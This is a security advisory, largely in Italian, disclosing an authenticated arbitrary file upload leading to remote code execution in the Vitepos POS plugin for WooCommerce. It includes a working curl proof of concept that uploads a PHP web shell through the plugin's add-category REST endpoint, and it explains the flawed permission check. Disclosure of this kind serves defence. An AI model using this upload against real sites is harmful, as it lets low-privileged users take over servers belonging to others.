
Disclosure for CVE-2025-13156
Divulgazione per CVE-2025-13156
Questo repository divulga una vulnerabilità scoperta in Vitepos – Point of Sale (POS) per WooCommerce <= 3.3.0, plugin WordPress sviluppato da appsbd.
| ID CVE | Tipo | Componente | Impatto |
|---|---|---|---|
| CVE-2025-13156 | Caricamento Arbitrario di File Autenticato (Subscriber+) che porta a Esecuzione di Codice Remoto | modules/class-pos-settings.php api/v1/class-pos-product-api.php | Caricare file arbitrari sul server del sito interessato |
curl -k \
'http://localhost:8080/wp-json/vitepos/v1/product/add-category' \
-H 'Cookie: wordpress_logged_in_<your_hash>=<your_cookie>' \
-H 'X-WP-Nonce: <your_nonce>' \
-F 'category_name=evil' \
-F 'category_parent=0' \
-F 'category_description=PoC-shell' \
-F 'category_image=@./shell.php;filename="shell.php";type=application/octet-stream'
Le route REST del plugin sotto /wp-json/vitepos/v1/product/... si basano su un controllo dei permessi permissivo che accetta di fatto qualsiasi utente connesso (is_user_logged_in()), ignorando se il chiamante è un utente POS o ha la capacità di gestire i termini di prodotto. Di conseguenza, ruoli a bassi privilegi (es. Subscriber) possono raggiungere endpoint come add-category/update-category.
Non può essere posizionato direttamente sotto WebRoot, quindi potrebbe non avere successo in alcuni ambienti. Sotto Uploads di solito l'esecuzione PHP non è consentita, quindi ho pensato che non sarebbe stato possibile a meno che l'ambiente non fosse davvero strano. Non appena ho visto la stringa application/octet-stream nell'elenco dei MIME consentiti, ho avuto un brutto presentimento, ma ha davvero funzionato, sono rimasto sorpreso. In realtà il core di WordPress impedisce il caricamento di PHP, ma questo plugin implementava un'elaborazione personalizzata, quindi questa vulnerabilità potrebbe essere stata riprodotta. È un caso piuttosto raro.
Nome: MooseLove
Ruolo: Ricercatore di sicurezza indipendente / cacciatore di bug
Contatto: Disponibile su richiesta
Questo avviso è fornito per la consapevolezza della sicurezza pubblica. Libero di condividere con attribuzione.